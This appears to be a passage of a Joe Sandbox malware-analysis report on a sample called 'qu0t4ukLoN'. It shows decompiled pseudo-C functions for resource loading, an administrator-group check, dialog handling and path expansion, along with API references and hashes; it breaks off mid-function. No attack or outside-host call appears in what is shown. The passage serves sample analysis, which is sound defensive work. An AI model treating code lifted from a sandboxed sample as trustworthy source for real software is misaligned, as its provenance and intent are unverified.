                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 3785188418-1757243477
                                                                                                                                                                                                        • Opcode ID: f7e62517c0f203b1db1783790b9c3f190e73328708a383651fb0ee994f28018a
                                                                                                                                                                                                        • Instruction ID: 895e9458c4e315d07ccdcdb139f400635ec7b22de0ad2a2398bb7665531fe5a2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7e62517c0f203b1db1783790b9c3f190e73328708a383651fb0ee994f28018a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B117F32348221BBDF119BA89C0CB9A3AF4FB5A721F204713F825951F0DF759A42C696
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A9468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00A9468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}








                                                                                                                                                                                                        0x00a94699
                                                                                                                                                                                                        0x00a9469b
                                                                                                                                                                                                        0x00a946a9
                                                                                                                                                                                                        0x00a946af
                                                                                                                                                                                                        0x00a946b4
                                                                                                                                                                                                        0x00a946bc
                                                                                                                                                                                                        0x00a946f9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a946f9
                                                                                                                                                                                                        0x00a946d9
                                                                                                                                                                                                        0x00a946dd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a946e5
                                                                                                                                                                                                        0x00a946ef
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a946f5
                                                                                                                                                                                                        0x00a946ff

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: TITLE$photo660
                                                                                                                                                                                                        • API String ID: 3370778649-2621105198
                                                                                                                                                                                                        • Opcode ID: 96aca75a9b051fbf5405e3ab5f0298e9928cb0f6af38c1c9caeb0b7e5d8c884d
                                                                                                                                                                                                        • Instruction ID: 9d9cfc21d34befd617bc1e1335bd0b0addbfc6407c857c45ceb75964476b921e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 96aca75a9b051fbf5405e3ab5f0298e9928cb0f6af38c1c9caeb0b7e5d8c884d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0601D1723402207BE7205BE56C4DF6B3E6CDBDAB62F140417FB4A86190CEA1884383E2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A917EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                        			E00A917EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0xa98004; // 0x6298f871
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0xa9a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00A96CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}



















                                                                                                                                                                                                        0x00a917f6
                                                                                                                                                                                                        0x00a917fd
                                                                                                                                                                                                        0x00a91805
                                                                                                                                                                                                        0x00a9180b
                                                                                                                                                                                                        0x00a9180d
                                                                                                                                                                                                        0x00a91815
                                                                                                                                                                                                        0x00a91818
                                                                                                                                                                                                        0x00a91820
                                                                                                                                                                                                        0x00a91824
                                                                                                                                                                                                        0x00a9182c
                                                                                                                                                                                                        0x00a91832
                                                                                                                                                                                                        0x00a91837
                                                                                                                                                                                                        0x00a91851
                                                                                                                                                                                                        0x00a91854
                                                                                                                                                                                                        0x00a9185d
                                                                                                                                                                                                        0x00a91862
                                                                                                                                                                                                        0x00a9186c
                                                                                                                                                                                                        0x00a91872
                                                                                                                                                                                                        0x00a91877
                                                                                                                                                                                                        0x00a9187e
                                                                                                                                                                                                        0x00a9187e
                                                                                                                                                                                                        0x00a91883
                                                                                                                                                                                                        0x00a91883
                                                                                                                                                                                                        0x00a9185d
                                                                                                                                                                                                        0x00a9188a
                                                                                                                                                                                                        0x00a9188a
                                                                                                                                                                                                        0x00a918a2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A918DD), ref: 00A9181A
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A9182C
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00A918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A918DD), ref: 00A91855
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?,?,?,?,00A918DD), ref: 00A91883
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00A918DD), ref: 00A9188A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                                                                                                                        • Opcode ID: 8ea42cda60d155b874b81d66151c63b751fbdd4e5be84dc0fc964270e75b6818
                                                                                                                                                                                                        • Instruction ID: d2ae7fa2e47dd2e96da184855b3e323dcec41bfc05ddf5d7bd32fdc92e6024eb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ea42cda60d155b874b81d66151c63b751fbdd4e5be84dc0fc964270e75b6818
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5118131F00209ABDB10DFA4DC49ABEBBB8EF44701F10456BFA12E6290DE308D018B91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A93450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A93450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E00A943D0(_t24, _t12);
					SetWindowTextA(_t24, "photo660");
					SetDlgItemTextA(_t24, 0x838,  *0xa99404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0xa991dc = 1;
					goto L8;
				}
				return 0;
			}








                                                                                                                                                                                                        0x00a93459
                                                                                                                                                                                                        0x00a9345c
                                                                                                                                                                                                        0x00a934d8
                                                                                                                                                                                                        0x00a934de
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a934e0
                                                                                                                                                                                                        0x00a9345e
                                                                                                                                                                                                        0x00a93463
                                                                                                                                                                                                        0x00a9349a
                                                                                                                                                                                                        0x00a934a0
                                                                                                                                                                                                        0x00a934a7
                                                                                                                                                                                                        0x00a934b2
                                                                                                                                                                                                        0x00a934c4
                                                                                                                                                                                                        0x00a934cb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a934cb
                                                                                                                                                                                                        0x00a93468
                                                                                                                                                                                                        0x00a9346e
                                                                                                                                                                                                        0x00a93474
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9347c
                                                                                                                                                                                                        0x00a9348c
                                                                                                                                                                                                        0x00a93490
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93496
                                                                                                                                                                                                        0x00a93484
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93486
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93486
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00A93490
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00A9349A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00A934B2
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 00A934C4
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00A934CB
                                                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 00A934D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 852535152-1757243477
                                                                                                                                                                                                        • Opcode ID: 25f5efad86de58d6170530d94ff63d1eb7c70988068b6f6d22acd71a38d91f24
                                                                                                                                                                                                        • Instruction ID: 78a44bd075de18e715d94eb13e92715ccdd260d55f59fb6f0fe47dde640acd54
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25f5efad86de58d6170530d94ff63d1eb7c70988068b6f6d22acd71a38d91f24
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2601B132340114ABDF269FA9DC0C96E3AF4EB89702F224126F956865A0CF719F43CBC5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A92AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00A92AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0xa98004; // 0x6298f871
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0xa99a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00A91680(_t65, E00A917C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E00A965E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00A91680(_t65, E00A917C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00A96CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}






















                                                                                                                                                                                                        0x00a92aac
                                                                                                                                                                                                        0x00a92ab7
                                                                                                                                                                                                        0x00a92abc
                                                                                                                                                                                                        0x00a92abe
                                                                                                                                                                                                        0x00a92ac3
                                                                                                                                                                                                        0x00a92ac6
                                                                                                                                                                                                        0x00a92ac9
                                                                                                                                                                                                        0x00a92ace
                                                                                                                                                                                                        0x00a92ae6
                                                                                                                                                                                                        0x00a92bdc
                                                                                                                                                                                                        0x00a92bdc
                                                                                                                                                                                                        0x00a92be0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92af2
                                                                                                                                                                                                        0x00a92afc
                                                                                                                                                                                                        0x00a92b00
                                                                                                                                                                                                        0x00a92b05
                                                                                                                                                                                                        0x00a92b05
                                                                                                                                                                                                        0x00a92b0b
                                                                                                                                                                                                        0x00a92bca
                                                                                                                                                                                                        0x00a92bd1
                                                                                                                                                                                                        0x00a92b11
                                                                                                                                                                                                        0x00a92b18
                                                                                                                                                                                                        0x00a92b26
                                                                                                                                                                                                        0x00a92b99
                                                                                                                                                                                                        0x00a92bc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92b9b
                                                                                                                                                                                                        0x00a92bae
                                                                                                                                                                                                        0x00a92bb3
                                                                                                                                                                                                        0x00a92bb5
                                                                                                                                                                                                        0x00a92bb5
                                                                                                                                                                                                        0x00a92bb8
                                                                                                                                                                                                        0x00a92bb8
                                                                                                                                                                                                        0x00a92bba
                                                                                                                                                                                                        0x00a92bbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92bb8
                                                                                                                                                                                                        0x00a92b28
                                                                                                                                                                                                        0x00a92b2e
                                                                                                                                                                                                        0x00a92b33
                                                                                                                                                                                                        0x00a92b39
                                                                                                                                                                                                        0x00a92b3c
                                                                                                                                                                                                        0x00a92b3c
                                                                                                                                                                                                        0x00a92b3e
                                                                                                                                                                                                        0x00a92b3f
                                                                                                                                                                                                        0x00a92b55
                                                                                                                                                                                                        0x00a92b5d
                                                                                                                                                                                                        0x00a92b64
                                                                                                                                                                                                        0x00a92b64
                                                                                                                                                                                                        0x00a92b7a
                                                                                                                                                                                                        0x00a92b7f
                                                                                                                                                                                                        0x00a92b81
                                                                                                                                                                                                        0x00a92b81
                                                                                                                                                                                                        0x00a92b84
                                                                                                                                                                                                        0x00a92b84
                                                                                                                                                                                                        0x00a92b86
                                                                                                                                                                                                        0x00a92b87
                                                                                                                                                                                                        0x00a92bbf
                                                                                                                                                                                                        0x00a92bc1
                                                                                                                                                                                                        0x00a92bc1
                                                                                                                                                                                                        0x00a92b26
                                                                                                                                                                                                        0x00a92bda
                                                                                                                                                                                                        0x00a92bda
                                                                                                                                                                                                        0x00a92be6
                                                                                                                                                                                                        0x00a92be6
                                                                                                                                                                                                        0x00a92bf8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A92AE6
                                                                                                                                                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A92AF2
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00A92B12
                                                                                                                                                                                                        • CharUpperA.USER32 ref: 00A92B1E
                                                                                                                                                                                                        • CharPrevA.USER32(?,?), ref: 00A92B55
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00A92BD4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 571164536-0
                                                                                                                                                                                                        • Opcode ID: f590e3c70d20d24a0f4292ece8e0b2bc17526f4ace8ac5bef8c4e358902c0893
                                                                                                                                                                                                        • Instruction ID: 15b1386419034eab08e3b6eff8aaa4ecc41ec0eebcd8d74a5edd9c0943868fc2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f590e3c70d20d24a0f4292ece8e0b2bc17526f4ace8ac5bef8c4e358902c0893
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A141D0347042466EDF159F249C54BFD7BE99FA6310F24419BE8C287202DF258E86CBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A943D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00A943D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0xa98004; // 0x6298f871
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00A96CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}
























                                                                                                                                                                                                        0x00a943d0
                                                                                                                                                                                                        0x00a943d8
                                                                                                                                                                                                        0x00a943df
                                                                                                                                                                                                        0x00a943e6
                                                                                                                                                                                                        0x00a943ec
                                                                                                                                                                                                        0x00a943f1
                                                                                                                                                                                                        0x00a94400
                                                                                                                                                                                                        0x00a94403
                                                                                                                                                                                                        0x00a9440b
                                                                                                                                                                                                        0x00a94420
                                                                                                                                                                                                        0x00a94429
                                                                                                                                                                                                        0x00a94437
                                                                                                                                                                                                        0x00a94444
                                                                                                                                                                                                        0x00a94447
                                                                                                                                                                                                        0x00a9444d
                                                                                                                                                                                                        0x00a94454
                                                                                                                                                                                                        0x00a9445b
                                                                                                                                                                                                        0x00a94460
                                                                                                                                                                                                        0x00a94461
                                                                                                                                                                                                        0x00a94467
                                                                                                                                                                                                        0x00a9446f
                                                                                                                                                                                                        0x00a94473
                                                                                                                                                                                                        0x00a94473
                                                                                                                                                                                                        0x00a94463
                                                                                                                                                                                                        0x00a94463
                                                                                                                                                                                                        0x00a94463
                                                                                                                                                                                                        0x00a9447a
                                                                                                                                                                                                        0x00a94481
                                                                                                                                                                                                        0x00a94484
                                                                                                                                                                                                        0x00a9448a
                                                                                                                                                                                                        0x00a94492
                                                                                                                                                                                                        0x00a94496
                                                                                                                                                                                                        0x00a94496
                                                                                                                                                                                                        0x00a94486
                                                                                                                                                                                                        0x00a94486
                                                                                                                                                                                                        0x00a94486
                                                                                                                                                                                                        0x00a944b8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00A943F1
                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00A9440B
                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00A94423
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A9442E
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A9443A
                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00A94447
                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A944A2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2212493051-0
                                                                                                                                                                                                        • Opcode ID: 7ac51760e8850dab26da5f9eb87d97199d6e1bf10a77b960d89173f22362a43f
                                                                                                                                                                                                        • Instruction ID: 59f9e04058dd83d851518cf3fad4023b0ebe8494be27bdc0b04e7e811fdae6d4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ac51760e8850dab26da5f9eb87d97199d6e1bf10a77b960d89173f22362a43f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C931FD72B00119ABCF14CFF8DD49DAEBBB5EB89310F15426AE805B7250DA706D068BA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A96298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E00A96298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0xa98004; // 0x6298f871
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E00A9171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0xa99124 = 0x80070714;
						_t36 = _t46;
